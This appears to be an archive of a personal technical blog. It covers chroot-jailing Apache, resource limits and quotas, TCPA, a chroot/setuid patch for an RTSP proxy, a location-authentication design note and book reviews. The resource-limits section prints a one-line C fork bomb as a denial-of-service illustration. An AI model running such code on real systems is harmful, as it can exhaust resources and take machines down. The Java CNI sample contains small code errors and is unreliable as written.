    Download an apache tarball from your favourite mirror and expand
    it. I'm using version 1.3.26 here.
    
    % cd ~/src
    % tar xzf apache_1.3.26.tar.gz
    % cd apache_1.3.26
    % ./configure --prefix=/home/agl/tmp/apache
    % make
    % make install
    
    You may wish to add other options to the configure command line to
    enable your favourite mod_foo.
    
    Now we reconfigure apache to expect the different path names. Since
    /home/agl/tmp/apache is going to be the new root apache will see paths
    like /htdocs.
    
    Apache's startup script is a shell script so we are going to need a
    shell in our root to run it. Since this is a Linux box I'm going to be
    using bash. If you have a real Bourne shell you may wish to use that instead.
    
    % cd ~/tmp/apache
    % vim /bin/apachectl
    
    We need to change 3 lines in this file and add one. Change the shebang
    line to expect a shell in the root directory and a couple of the
    paths. We also add a -f option to httpd to tell it where its config
    file is.
    
    #!/bin/sh -> #!/bash
    PIDFILE=/home/agl/tmp/apache/logs/httpd.pid -> PIDFILE=/logs/httpd.pid
    HTTPD=/home/agl/tmp/apache/bin/httpd -> HTTPD="/bin/httpd -f /conf/httpd.conf"
    
    Now, just before the line which reads "ERROR=0" insert a line reading
    "cd /". This sets the current directory to be inside the jail.
    
    We we need to remove the string "/home/agl/tmp/apache" every time it
    appears in conf/httpd.conf. Use your favourite text editor, or do
    
    % vim conf/httpd.conf
    :%s!/home/agl/tmp/apache!!
    
    You also need to find the User and Group directives in this file and
    change them to read
    
    User apache
    Group apache
    
    Now we come to the second part of setting up a chroot jail - creating
    the environment. Foremost in our mind are the user and group names we
    just told apache to use. It needs to be able to turn these into real
    UIDs and GIDs. For this it needs an /etc/passwd and /etc/group in the
    jail. However, I recommend that you also setup a user and group in the
    main passwd and group files with a sensible name so processes outside
    the jail can make sense of the httpd processes inside (for example, ps).
    
    In etc/passwd put
    
    apache:x:65534:65534:nobody:/home:/bin/sh
    
    and in etc/group put
    
    apache:x:65534:
    
    Now set the permissions
    
    % chmod 664 etc/passwd etc/group
    
    All modern systems support some kind of runtime linking of
    libraries. In order to run apache and bash we need to copy the
    libraries they require. These requirements vary greatly but the ldd
    command will generally reveal all the requirements.
    
    % ldd ../bin/httpd
    	libm.so.6 => /lib/libm.so.6 (0x00136000)
    	libcrypt.so.1 => /lib/libcrypt.so.1 (0x00158000)
    	libc.so.6 => /lib/libc.so.6 (0x00185000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)
    % mkdir lib
    % cd lib
    % cp /lib/ld-linux.so.2 .
    % cp /lib/libc.so.6 .
    % cp /lib/libcrypt.so.1 .
    % cp /lib/libm.so.6 .
    % ldd /bin/bash
    	libncurses.so.5 => /lib/libncurses.so.5 (0x00136000)
    	libdl.so.2 => /lib/libdl.so.2 (0x00174000)
    	libc.so.6 => /lib/libc.so.6 (0x00178000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)
    % cp /lib/libncurses.so.5 .
    % cp /lib/libdl.so.2 .
    % cp /lib/libnss_files.so.2 .
    % cd ..
    
    The last library isn't mentioned by any ldd listing, but glibc loads
    it on the fly to read /etc/passwd and /etc/group. Now we copy bash and
    cat into the jail (apachectl uses cat) and create /dev/null.
    
    % cp /bin/bash .
    % cp /bin/cat bin
    % mkdir dev
    % su
    # cp -a /dev/null dev
    
    That's the environment completed. Apache can be run by
    
    # chroot . ./bin/apachectl start
    
    * Limits
    
    Resource limits are required on any secure system - especially
    multi-user systems. Without them (and they are often disabled by
    default) users may use up so many resources that critical systems are
    unable to function and service is denied to others.
    
    A simple example is a fork bomb. The following line of C code will
    bring systems without resource limits to their needs - sometimes
    requiring a power cycle to recover.
    
    	  for (;;) fork ();
    
    There are two many types of resource limit - quota and limits.conf
    
    ** Limits.conf
    
    This file describes the limits placed on users for resources such as
    the process table and memory. The number of rules in this file should
    be kept to a minimum. Limits should be set on whole groups to keep the
    file manageable.
    
    ** Quota
    
    Quota controls the amount of disk space that users and groups may
    use. Quota systems vary widely between UNIXes and you may have to
    consult the documentation for your system for the specific commands
    required.
    
    Generally quota systems allow the restriction of blocks and
    inodes. Blocks are 512 or 1024 byte chunks and limiting this number
    limits the actual amount of data that a user may own. Inodes are
    structures that describe files and many file-systems have hard limits
    on the number available. Unless you limit them a user may be able to
    fill the inode table and prevent new files being created.
    
    * Security at more abstract levels
    
    There are many social aspects of security that also need to be considered
    by a poor-overworked sys admin. Much of this area of outside the scope of
    a book such as this.
    
    Much as been written about the security of
    passwords, or rather the lack of, but still insecure passwords remain.  
    Unless your users are security-savvy you can be sure that most of their
    passwords will be simple to guess.
    
    Several options present themselves from seeking to educate users, setting up
    cracklib or providing a version of passwd which only gives out random
    passwords.
    
    Social Engineering is another method for attackers to gain access to a 
    system and is very hard to defend against. It generally involves tricking
    users into revealing passwords or running Trojan programs. There are no good
    technical measures against this family of attacks. They require user
    education and strict guidelines.
    

    Well, it seems that my previous...

    Well, it seems that my previous comments about TCPA not being able to secure boot were true, but this work from IBM suggests that it can provide a primitive that says "only decrypt this on a given boot config".

    Now, a boot config (my name) is defined loosely in the TCPA specs (site seems to be down right now, maybe MsSQL worm) and I would wish to see exactly what it is hashing before I use it. But I can see many useful applications of this. For one, encrypt the hard drive and store the decryption key in the TCPA chip. That way you get seemless boots, but you cannot root the box with a floppy disk. I can think of a number times that function would have been nice. So I think I would be quite happy to have a TCPA motherboard and I want to see lots of neat uses of them.

    More on Proof by Contradiction

    Ok, after talking with one of the maths people here about this, it boils down to this: proof by contractions works only if you accept A∨¬A. That's called the law of the excluded middle.

    Now, if you look that up (e.g. on MathWorld) you'll find at it says something like "this means that A is either true or false". But it doesn't. A∨¬A means that either A or ¬A is a theorm (i.e. can be reached on our axiom tree). So it really says either A or ¬A is provable; but Gödel has shown otherwise.

    And in my logic notes the following proof of A∨¬A was given:

    1¬(A∨¬A)assume
    2Aassume
    3A∨¬A∨I(2)
    4¬E(1,3)
    5¬A¬I(2,4)
    6A∨¬A∨I(5)
    7¬E(1,6)
    8¬¬(A∨¬A)¬I(1,7)
    9A∨¬A¬¬(8)

    (Box proofs are a pain to typeset in HTML)

    That means that the basis of proof by contradiction is proven using proof by contradiction. (it also has a ¬¬ elimination, but that's not the subject of this post)

    Thankfully, a google shows that I'm not the only person to ever think this way. (Which makes me a little more confident that someone like Ralph or Bram isn't going to stomp me with a devistating counter argument). Intuitionistic Logic seems be (at least) a similar school of thought. A few more links that I haven't fully digested yet:

    Book Review: Moonseed

    (Stephen Baxter, 0-061-05044-x (Hardback), 0-061-05903-x (Softback))

    Well, Edinburgh, geology and Sci-Fi. Ian (Clarke) and Matt (Key) eat your hearts out. Baxter always wrote pretty hard sci-fi but that generally means physics. This is the first time I've read a book where the science was mainly geology, but at no cost to the book. This book is novel, well written and engrossing (which is measured by the number of times I put the book down during a lecture).

    Book Review: Inner Loops

    (Rick Booth, 0-201-47960-5)

    This book deals with eeking out every last cycle from Intel processors. It's looking a bit dated now (only covers upto MMX, and even then it only covers that by documentation), however many of the tricks still hold true. The author covers each chip in turn (486-PPro) and then practical applications, including random number generators and JPEG codecs.

    Generally not very useful unless you do this sort of thing often, but if you can get it from a library then it's worth a flick through.

    Proof by Contradiction is Crap

    Google is being a little useless, but I have it on decent authority that one can prove, by contradiction, that there exists a well ordered relation for ℜ. In other words; that there is a minimal real number. That about that for a second.

    (context switch) You can look at something like metamath and find a axiom system, on top of which a sizeable amount of maths is built. Generally, all maths should be done this way but it's too tedious, so generally people don't bother being that precise in proofs, but the general idea is that they could, if they wished.

    Now you can think of the axiom system as a tree with n roots (one for each axiom). You can move from any point in a number of different ways by using a rule of inference the make a new theorem. (Ian and Will can stop shouting GEB at this point). This axiom tree branches into the space of all possible theorems.

    Now, we all hope like hell that our axiom tree only ever hits true statements. But we know that it doesn't hit all true statements (by Gödel). But when people prove by contradiction they start from a theorum and reach ⊥ (false). Since we assume that, starting from a point on the tree, we cannot reach a false statement like ⊥, they then assume that the original statement is false. Which is rubbish. What they have showed is that it isn't on the tree, and thus that it's not-provable (using that system).

    IV KeyVerify is working a...

    IV KeyVerify is working again. Now on Imperial servers.

    Testing my belief in free-speech

    From /.

    I think the key problem is ISPs that do not block egress traffic on port 25. If you need to send mail through a different SMTP server than provided by your ISP, the admin of that server ought to provide you with a means of using it with authentication on a port other than 25

    At least it was on slashdot so people know it's moronic, but good god what a prat. Because the email system is open to abuse, we should split the world in two (those deemed 'good enough' to send email and those who aren't)? Of course, the difference between those two classes would be that the former have more money. I just don't want to start on what a bad idea that is.

    (Incidently, that does the same thing that blacklists now do, but at the other end and I think those blacklists are equally moronic.)

    Location authentication

    Someone from CyberLocator contacted me. It seems they do the location based authentication that I was talking about (and have a pretty neat way of doing it).

    Well, I spent the afterno...

    Well, I spent the afternoon trying to get Bochs to work. Unfortunately, the networking is just broken in both packet socket and tuntap mode. The problem is someplace odd in the code and I don't feel active enough to hunt it down - I found an easy bug, but that wasn't enough.

    So, kissing the feet of the statue of RMS that I keep in the corner and asking for forgiveness, I install VMWare. And what did the wonders of commercial software manage? "Cannot allocate memory" (VM is setup for 32 megs and I have > 350M free).

    I'll see if I can dig up an old box tomorrow.

    Genetic Information

    So here's your interesting fact for the day (and example of evolution in action). Viruses have an evolutionary pressure to have a small genome which means they have to pack as much information in per base pair. Here's a base breakdown for a randomly picked virus genome:

    A: 28.9% G: 23.8% T: 22.2% C: 25.1%

    And for human insulin:

    A: 17.0% G: 35.2% T: 16.7% C: 31.1%

    So we have baggy genomes and don't bother packing as much information into our coding sequences.

    In extreme cases, some viruses have proteins encoded in all 3 frames. But if you don't understand that I don't have the space to explain it here.

    Will pointed me to this p...

    Will pointed me to this page for all my weird-glyphs-in-HTML needs. A quick Python script produces this useful table from that data. Your browser may not render all of these.

    AEligÆ AacuteÁ Acirc AgraveÀ AlphaΑ AringÅ Atildeà AumlÄ
    BetaΒ CcedilÇ ChiΧ Dagger DeltaΔ ETHÐ EacuteÉ EcircÊ
    EgraveÈ EpsilonΕ EtaΗ EumlË GammaΓ IacuteÍ IcircÎ IgraveÌ
    IotaΙ IumlÏ KappaΚ LambdaΛ MuΜ NtildeÑ NuΝ OEligŒ
    OacuteÓ OcircÔ OgraveÒ OmegaΩ OmicronΟ OslashØ OtildeÕ OumlÖ
    PhiΦ PiΠ Prime PsiΨ RhoΡ ScaronŠ SigmaΣ THORNÞ
    TauΤ ThetaΘ UacuteÚ UcircÛ UgraveÙ UpsilonΥ UumlÜ XiΞ
    YacuteÝ YumlŸ ZetaΖ aacuteá acircâ acute´ aeligæ agraveà
    alefsym alphaα amp& and ang aringå asymp atildeã
    aumlä bdquo betaβ brvbar¦ bull cap ccedilç cedil¸
    cent¢ chiχ circˆ clubs cong copy© crarr cup
    curren¤ dArr dagger darr deg° deltaδ diams divide÷
    eacuteé ecircê egraveè empty emsp ensp epsilonε equiv
    etaη ethð eumlë euro exist fnofƒ forall frac12½
    frac14¼ frac34¾ frasl gammaγ ge gt> hArr harr
    hearts hellip iacuteí icircî iexcl¡ igraveì image infin
    int iotaι iquest¿ isin iumlï kappaκ lArr lambdaλ
    lang laquo« larr lceil ldquo le lfloor lowast
    loz lrm lsaquo lsquo lt< macr¯ mdash microµ
    middot· minus muμ nabla nbsp  ndash ne ni
    not¬ notin nsub ntildeñ nuν oacuteó ocircô oeligœ
    ograveò oline omegaω omicronο oplus or ordfª ordmº
    oslashø otildeõ otimes oumlö para part permil perp
    phiφ piπ pivϖ plusmn± pound£ prime prod prop
    psiψ quot" rArr radic rang raquo» rarr rceil
    rdquo real reg® rfloor rhoρ rlm rsaquo rsquo
    sbquo scaronš sdot sect§ shy­ sigmaσ sigmafς sim
    spades sub sube sum sup sup1¹ sup2² sup3³
    supe szligß tauτ there4 thetaθ thetasymϑ thinsp thornþ
    tilde˜ times× trade uArr uacuteú uarr ucircû ugraveù
    uml¨ upsihϒ upsilonυ uumlü weierp xiξ yacuteý yen¥
    yumlÿ zetaζ zwj zwnj

    TCPA BIOSes

    So, AMI has released the first TCPA enabled BIOS. At first I was quite pleased at it occurred to me that it might be able to secure boot GRUB. Of course, it has all the nasty TCPA stuff too, but I'm not going to use that. If it has a write-enable jumper on the motherboard that I can bridge to write an SHA1 checksum, I would be quite happy. However, having read some of the (dry and frankly confusing) specs it doesn't even seem able to do that. So it really is utter worthless crap.

    (Technical note: I know the BIOS only loads a bootsector into memory and checksumming that wouldn't be enough to secure it, but the boot process could be modified so that the BIOS loads the whole lot. Given what changes the TCPA are trying to inflict they wouldn't even blink at that.)

    RTSP

    RTSP is the protocol used by RealPlayer to stream its stuff. Now RealPlayer is pretty evil, but RTSP looks slightly open. At least Real provides a proxy server for it.

    We'll see how it works tomorrow, but for the moment the essential agl patch; chroot and setuidgid.

    --- rtspproxy.cpp	Fri Feb  9 23:38:53 2001
    +++ rtspproxy.cpp	Thu Jan  9 17:10:32 2003
    @@ -12,6 +12,9 @@
     #include <string.h>
     #include <signal.h>
     #include <stdarg.h>
    +#include <sys/types.h>
    +#include <unistd.h>
    +#include <grp.h>
     
     #include "app.h"
     #include "rtspproxy.h"
    @@ -1277,6 +1280,8 @@
         printf( "    -v              Print version information.\n");
         printf( "    -h              Display this help message.\n");
         printf( "    -d              Enable useful debug messages.\n");
    +    printf( "    -u <uid> <gid>  Set UID and GID.\n");
    +    printf( "    -c <path>       Chroot to path.\n");
     }
     
     int main( int argc, char** argv )
    @@ -1328,6 +1333,31 @@
             {
                 g_DebugFlagTurnedOn = true;
             }
    +	else if ( strcasecmp (argv[i], "-c" ) == 0 ) {
    +		if (i + 1 >= argc) { Usage (argv[0]); exit(1); }
    +		i++;
    +		if (chroot (argv[i]) == -1) { perror ("Failed to chroot"); exit(1); }
    +		if (chdir ("/") == -1) { perror ("Failed to chdir after chroot"); exit (1); }
    +	}
    +	else if ( strcasecmp (argv[i], "-u" ) == 0 ) {
    +		if (i + 1 >= argc) { Usage (argv[0]); exit(1); }
    +		i++;
    +		INT16 uid = atoi ( argv[i] );
    +		if (uid == 0) { printf ("Bad uid\n"); exit (1); }
    +		if (i + 1 >= argc) { Usage (argv[0]); exit(1); }
    +		i++;
    +		gid_t gid = atoi ( argv[i] );
    +		if (gid == 0) { printf ("Bad uid\n"); exit (1); }
    +		
    +		if (setgroups (1, &gid) == -1) {
    +			perror ("failed to set groups");
    +			exit (1);
    +		}
    +		if (setuid (uid) == -1) {
    +			perror ("failed to set uid");
    +			exit (1);
    +		}
    +	}
         }
     
         app.Run();
    

    Jon Lech Johansen has bee...

    It seems that some people...

    It seems that some people (well, at least one) think that I have a Avi (from Cryptonomicon) style obsession with WW2. I guess that comes from the picture and quote above. So just to prove that I don't really, and there's nothing WW2 about IV's other content, try it in:

    Maybe I should do a few more and have it rotate each day

    Today has ben an utterly ...

    Today has ben an utterly fucking shit day; worst day I've had in over a year. So, if you'll excuse me I just need to..

    AAAAAAAAAAAAAAAAAAAGGGGGGGGGGHHHHHHHHHH!!!!!!!!!!!!!!!!

    Right. Here's hoping tomorrow is better.

    The management apologise for that brief interruption.

    The deptment has a list o...

    The deptment has a list of projects that people want doing. Sometimes they are specific and sometimes more in the form of "I wonder...". Here's the text of an I wonder project that I did in a loose hour today. Might be interresting for some people.

    Detection of User Location 
    -------------------------- 
    Adam Langley, agl@imperialviolet.org
    
    Problem:
    
    "How can we reliably identify whether users are physically located in
    any particular region when they access our systems across the LAN/WAN
    (so that we can control what data access that have given different
    secrecy constraints)."[0]
    
    Since the system is to be accessed across a network the only proof of
    location we can offer is information. Since the server's view of the
    world is limited to the data that passes through its network card it
    must trust another device to tell it the location of a user requesting
    some service.
    
    Having the server trust some special code is trivially vulnerable to a
    replay attack. Thus, in order for the server to know the location of a
    user, a challenge-response protocol must be used, and the challenges
    must timeout.
    
    The obvious answer to the problem of a trusted device to handle location
    is a system based around a GPS receiver that the user possesses. The
    problems with this are threefold:
    
    Firstly, in order for the server to trust the device it must be
    tamper-resistant. The level of tamper-resistance required varies with
    the security needs of the server, but if a location based security
    policy is even being considered then it's reasonable to expect that the
    server has some pretty impressive security needs and, correspondingly,
    that the device needs to be highly temper-resistant.
    
    Unfortunately, strong tamper-resistance is a difficult problem.
    Companies such as Cambridge Aero Instruments[1] manufacture
    tamper-resistant GPS systems for applications such as gliding
    competitions (so that the contestants can prove that they reached the
    checkpoints). However, such a GPS system would have to be integrated
    into a package that also contains enough processing power to perform
    public-key cryptography (such as an IBM 4758). This is likely to be
    prohibitively expensive.
    
    Secondly, the GPS system[2] has no authentication built in. Even if the
    device were perfectly tamperproof there would be nothing preventing an
    attacker putting it in a Faraday cage and faking the GPS signals.
    
    Thirdly, GPS jamming is reasonably simple[3]. A DoS attack could be
    launched against a secure installation (where these devices are used) by
    jamming GPS signals.
    
    These aforementioned problems with GPS suggests that a trusted device
    know its location be other means, such as its immobility. Assuming that
    areas that are considered secure locations (by this system) are
    physically controlled then it would be reasonable to use much less
    tamper-resistance as the equipment and time available to an attacker
    would be limited[4]. Thus the reduced tamper-resistance required makes
    the cost viable. The method of keeping it in place remains to be decided
    
    The interface of such a device deserves some consideration. A user must
    present a server generated challenge and pass the reply back to the
    server within the time limit. Since a strong connection to physical
    location must be preserved, a physical interface is appropriate; a
    keyboard for input and a till printer for output. The output could be a
    monitor, but since the replies are going to be quite complex (say, 160
    bits base64 encoded) then the users are going to write them down anyway
    so a till printer will save them the time and effort. Postit notes and a
    pen should be provided by the terminals for the same reason.
    
    The challenges are not sensitive and the replies are only valid for a
    short time (to be determined) and only on a single terminal. (It goes
    without saying that man-in-the-middle attacks against the terminals must
    be prevented by the cryptographic protocol). Also, it must be considered
    that this location authentication is a hassel for the user and (with the
    security requirements in mind) the number of authentications in a given
    time should be less than for other schemes (such as passwords).
    
    Conclusions
    -----------
    
    A location authentication system is certainly possible given a number of
    assumptions:
    	* that locations considered secure by the system are physically
    	  secure against people bring in certain equipment (such as
    	  X-ray machines[4] and shaped charges[5]) and spending long
    	  amounts of time physically attacking the trusted location box
    	* that the terminals are trusted not to leak the information
    	  once accessed, or to allow a man-in-the-middle attack And at
    	  certain costs:
    	* Inconvenience for the user User training A trusted location
    	* box per location
    Much remains unconsidered:
    	* The details of cryptographic chal-rep protocol The design and
    	* cost of the trusted location box The method of keeping the
    	* trusted location box in place The human factors, such as the
    	* presentation of the data and
    	  the length of the timeout
    
    [0] http://www.doc.ic.ac.uk/%7Esjn5/docpp/cgi-bin/
        display_project.cgi?project=709
    [1] http://www.cambridge-aero.com/
    [2] http://www.phrack.com/phrack/55/P55-14
    [3] http://www.phrack.org/phrack/60/p60-0x0d.txt
    [4] Security Engineering, Ross Anderson, Chapter 14
    [5]                                      Chapter 11, Section 5
    

    newdocms

    Opps. Looks like I missed actually uploading the tarball for bttrackd. I wonder how long that's been broken - months I guess.

    This came up on slashdot today. It's an attempt to replace standard filesystems with a string-string metadata based system and categorisation. The metadata is pretty standard and the categorisation is hierarchical. Read the page, it's pretty neat and, above all, it's real code.

    Now, this kind of thing is one of my pet subjects so I have a couple of criticisms. Firstly, string-string metadata looses some useful functionality of string-object systems. If the author of a document is "John Smith" then I cannot simply ask for the author's email address because the string "John Smith" is only loosely coupled to the object (if it exists) that describes that person. Also, this system doesn't try to extend this system very far. He see it as a way of filing documents (which is all well and good), but this is far short of what vaporware like IronDoc and landscape try to do. Then again, worse is sometimes better and he has code behind him.

    A couple of recent patche...

    A couple of recent patches:

    • xchat-1.9.8-treeview.diff - adds treeview support to Xchat 1.9.x. Not really fully tested but it seems to work. God knows what the GTK developers were on when they designed their new tree widget thou.
    • wget-patch - stops wget from stripping // froms URLs. This is needed for Freenet.

    First blog of the new yea...

    First blog of the new year! (of course, being in the UK, I get a 5-8 hour advantage over most people).

    Fallen Dragon

    Book reviews today...

    (Peter F. Hamilton, 0-330-48006-5)

    I've always really enjoyed Hamilton's books; every single one of them. Night's Dawn is an incredible epic and I highly recommend it if you're ever suck on a dessert island for a few weeks.

    Fallen Dragon is set in a different universe to his other books, thou there are many similar ideas (like genetic enhancement and neural interfaces). I've never felt that Hamilton wrote very deep sci-fi like Baxter or Egan, but he tells a fantastic story.

    This particular fantastic story is totally centered about one person and it's told from two different points in time at once. Each chapter alternates between this guy's childhood and a point much further on in his life. As you read about the earlier experiences, the later ones start to make more sense and by the end of the book the early thread is upto where the later one started.

    The ending I won't talk much about because it will spoil the book. It's a good ending (which is foreshadowed, but I didn't make the connection till afterwards), but I can't help but feel it raises more questions than it answers.

    Anyway; if you see it, consider buying; you'll enjoy it

    Prey

    (Michael Crichton, 0066214122)

    Well, it's another Crichton. Never deep, but a couple of neat ideas. If you have read Timeline then you know the style. I get the feeling it was written with a film in mind. It's not long (I finished it in a night), nor taxing. I wouldn't buy it, but don't run screaming if it drops on your doorstep either.

    Altas Shrugged

    (Ayn Rand, 0-451-19114-5)

    Zooko persuaded me to read this huge book, and I'm quite glad that I did (thanks Zooko). It really is long (and I must admit that I skipped most of the Galt monologue) but it's quite enjoyable.

    It doesn't change my view of the issues she covers one little bit thou. It's pretty much the minarchist capitalist manifesto, which is nice because I quite like minarchist capitalism. Rand is a little more minarchist than I am, but that's ok.

    Interestingly enough she doesn't cover environmental issues at all (despite dealing with railroads and steel mills) which is a shame because that's one of the main arguments people beat anarchists/extra-minarchists with. But then, being American, the thought might never have had occurred to her.

    In the end, I don't really like arguing about exactly what form of government would be best in a world where they are rapidly going in totally the wrong direction. It just seems a little pointless.

    It's a decent book; maybe a little too long. One might want to try The Moon is a Harsh Mistress for something smaller.

    15 Idiots Rule the World

    A new article from Paul Graham predicting the end of spam. Nice to hear after the year of doom mongers predicting the end of email because of spam and, in terms of who I'd side with in an argument, Paul Graham rates just a little higher.

    Back in London. I was onl...

    Back in London. I was only loafing about at home, so I might as well loaf about someplace with a better connection. I'm sure the monkey running the ticket till over charged me (23.50 for a single to London) but the pricing structure for the railways is so damm complex you can't tell. Also, the train didn't even advertise that it was stopping where I wanted it to. I just got on and hoped that that Railtrack wasn't fibbing to me (they weren't, but it's still crappy).

    I've just rsync'ed Gentoo - crap there's a lot of new stuff. I wish Gentoo had a way of only upgrading stuff which has jumped in upstream release number.

    Over the Xmas break I've had a cluster of P4's in the Imperial labs generating keys for coderman who (I guess) wants them to test this idea. By the last count he had 150000 keys and was winding up, so I'm giving the lab computers a break now. A couple of things that I'll probably end up looking up later:

    • Don't bother reading the screen manpage for how to start a detached session - it doesn't work right. Instead do: screen /bin/sh -c "screen -d ; cmd ; cmd ; cmd"
    • Padding a number with zeros in a shell script: `printf "%02d\n" $x` (that pads to length 2)

    Britain leads the world again

    coderman:

    if I laugh in a nihilistic euphoria any harder I am going to burst a spleen

    a spleen? You have a backup?

    So, the US wants to monitor all it's net traffic? (NYT link: user/passwd = strsnyt). Well, the UK has had that for years, but here the "early warning centre" is called the GTAC (Govt Technical Advisory Centre, or something). And the US pretends that it leads the world in technical matters...

    After reading Aaron's Cre...

    After reading Aaron's Creative Commons launch talk I emailed him to ask exactly when some cool semantic webby stuff was going to happen. (I've ranted about this before). Well, quoting private emails is a little rude but he didn't seem to hold much hope of it happening anytime soon, which is a great shame. Unfortunately, I can't see any good way of solving this. Specs for a Person class, a Blog class and all manner of stuff could be constructed, but I don't know how we would persude anyone to use it:

    "Hey! Markup all the stuff on your website using our cool RDF!
    "Why?"
    "'Cos it's cool, look!" (point at some of the SemWeb vision stuff)
    "Hmm, that's neat. But what will it do now?"
    "Not a lot, I guess. But think how cool it will be in the future!"
    "So ask me again in the future, when it's cool"

    And so we're stuck. So does anyone have a SemWeb killer app to bootstrap everything?

    Mobile Phones

    Mixminion 0.0.1 has been released, and the first Mixminion anonymous message was posted to the mailing list. Congrats to the whole team.

    Also, the new edition of Unix Power Tools (O'Reilly) is out. I was a technical reviewer on this and it's everything you would expect from O'Reilly (even if UPT would be preaching to the converted for most of IV's readership). There is one chapter about which they seem to have ignored my comments. But then my comments were something along the lines of "This is rubbish, put this in instead ..." followed by the whole chapter rewritten. I'll let you see if you can guess which chapter.

    The whole concept of phoning someone is a little broken. I want to be able to attach a priority to calls. If I need something now - it's a high priority call, if I just want to chat - it's low priority, and it's a persistent thing. When I get in from doing something (a high priority only state) I can drop to a low priority state and take all the low priority calls (so long as the people calling me are still in a low priority state). I'm sure you get the idea.

    (I'm at home, in Chelt, f...

    (I'm at home, in Chelt, for christmas)

    I had hoped to have IV hosted (web and email at least) on Imperial servers by now. Unfortunately, one of the Dept of Computing webservers was rooted on Thursday which ment that people were a little too busy to get round to it. I'm going to see metis (the current server) tomorrow with a new power supply anyway.

    And in answer to coderman's question: see this, this and this for an example of what crewing an event means. We started rigging that at 9am, people came in at 8pm, left at 2am (the following day) and we had cleared up by 4:30am (after which we went to the bar). This was taken about 5 in the morning (I'm the one on the far left).

    Freenet server problems

    It's been a Bad Server Weekend (tm).

    Firstly, hawk's outgoing SMTP relay started refusing to relay because hawk got listed as a dialup IP and the relay has spam blacklisting. (hawk is Freenet's server for stuff like mailing lists). Now, I'm not going to rant about spam blacklisting here because I'm not going to change anyone's mind about it. I can only suggest you look at alternatives like SpamAssassin and the new breed of Bayesian filters.

    Anyway, as a bodge I just set hawk to send email directly which worked for some people until Ian found another relay. However, since some of the lists which were blacklisting hawk gave contact details I tried emailing them:

    It's our understanding that all of 4.46.0.0 - 4.46.119.255
    is dynamic IP Verizon DSL.  As dynamic IP space, it's appropriate for it to be
    in our list.
    
    BTW...the addition of this space was prompted by abuse of this IP space by a
    professional spammer that has been spamming from a Verizon DSL account with
    dynamic IPs moving around this range for the past few months.
    

    I emailed back and the guy basically refused. But from a difference blacklist admin...

    Fixed in the next update. Thanks.

    So they aren't all bad.

    When it rains, it pours

    And once hawk was running again ... metis (this server) promptly died. I still don't know what happened as I haven't phoned since it came back online. It wasn't a power cut (the UPS didn't kick in if it was) and I hope it wasn't another rat pissing in the power supply. Anyway, it's running again but I really am going to move it to IC soon.

    And I was this close to 100 days uptime. (it was about 98 days when it died).

    Good Software

    Mozilla 1.2 really works well. It doesn't crash. It's pretty fast. Copy and paste has started working again after 1.0. Nice.

    Also, Straw is a good GTK feedreader. I'm using it for the moment.

    Mark Thomas

    Last night I went to see Mark Thomas at the SoHo theatre last night. For those who don't know of him (most of you) he's sort of a stand up comedian with a strong political bent. Basically, he makes you laugh talking about stuff like campaigning against the War on Iraq. If you ever get the chance to see him I strongly suggest you jump at it like a rabid ferret.

    As a side note, he's in court today trying to get an order to prevent the government going to war with Iraq without a new UN resolution. I donated to the legal fees and here's hoping he wins.

    Java CNI

    A quick lesson in the wonders of how Java and GCC work together.

    For quite a while now, the GCJ project has been adding Java support to GCC. It isn't perfect and building your big, using every API Java app with it could be a real pain. But it is getting better. Anyway, this is about working together.

    Java has always had JNI for interfacing with other languages (generally C/C++). It works, but it's not exactly clean. GCJ, however, has the CNI which works much more nicely. A small example:

    Make up a Java class and have some methods marked as public:

    class CNITest {
    	public static native int native_call (String a);
    
    	public static void main (String[] args) {
    		native_call ("testing");
    	}
    }

    Build a class file and generate the header from it

    gcj -C CNITest.java
    gcjh CNITest

    Write the native methods in whatever language you like (given that GCC and compile and link it with Java). In this case C++:

    #include "CNITest.h
    
    jint CNITest::native_call (jint a)
    {
            return a + 1;
    }

    Now build it all:

    gcj --main=CNITest -o cni CNITest.java cni.cpp

    and it all works. Woo!

    Stallman Speaking

    Went to listen to Stallman speaking on software patents at LSE today. He managed to panic the organiser when he didn't show, but after about 20 minutes someone said he had been spotted outside the tube station. Quite how he had been `spotted' I'm not sure, but he turned up 5 minutes later and things got underway.

    The venue was quite small and there were about 50 people there. For some reason the room (The Hong Kong theater) reminded me of Korea in the way that it looked like someone gave the architect a picture of an old church room and said "build it like this", but the architect didn't quite get it right.

    Anyway, a lot of people critise RMS for, basically, loosing his rag when he speaks but I guess he must have this speech pretty well practiced. In fact, maybe if he had lost his rag, I wouldn't have fallen asleep during it . It's not that it was boring, I was just pretty tired and it's almost instinctive when sitting in a lecture now.

    There's little point in repeating what RMS said as I would just be preaching to the converted. See this if you don't know it all already and RMS really is Quite A Nice Guy in person.

    Summer Jobs

    Ok, it's a little early but I'm looking about for summer jobs anyway. I have an interview tomorrow for a job doing door-to-door book selling in Nashville (weird, but what the hell). I'd quite like to work for O'Reilly in Boston, but they aren't really in a place to start employing people at the moment. So, if you want to offer me a job, you know where the email address is .

    /dev isn't enough

    Rumors are abound that Longhorn will have a new database file system. Of course, since it's Windows, nobody really cares because M$ have been talking about this since before 95 came out and we are still waiting. In fact, Ted Nelson[1][2] was talking about the same kind of ideas long before most of the people reading this were born.

    Ted Nelson's ideas about this were known as Xanadu and Zigzag (a specific implementation). Basically all data was contained in cells and cells could be linked along axis. The GZZ project (formally known as GZigZag) has a good document about these ideas.

    But, at it's simplest level it's about linking and it's about exposing. Now the classic system for this is the UNIX device system which exposes hard drives and other IO stuff pretty well. However, UNIX devices aren't exactly perfect. See this document about Plan9 for an example of the device model taken to a more useful level.

    But even in Plan9, data is still locked away in odd file formats and that means a lack of linkability and exposure.

    Take my mailbox, there's a huge amount of data in there locked away. I can't get a list of all the mail sent to me by a single person without a lot of work (see interwingle). Now you are free to say that it's a facet of how I store my mail (mbox format). But when I want to follow a link from an email, to it's sender, to his/her phone number (in another database) it ceases to be a problem limited to my MUA. If certain things were exposed better I should be able to to that, and follow links to anything else related I have about a person. This has harmonies with Semantic Web ideas, but this is about a human web of information - not a machine understandable one.

    Hans Reiser articulates similar ideas (possibly better than I do) in his whitepaper. Now, Hans sets down a lot more detail than I'm doing here, and I don't necessarily agree with all the detail (which you can skip anyway).

    Now, I've talked about this before and there is a strong link between the language parts of that rant and the ideas here, but I'm not going to go into that now.

    more to follow...

    Blogdex Spamming

    It seems that along with Referer spamming, SMB spamming, and all the old fashioned manifestations of this vile practice, we now have blogdex spamming. It looks like it's something akin to google bombing.

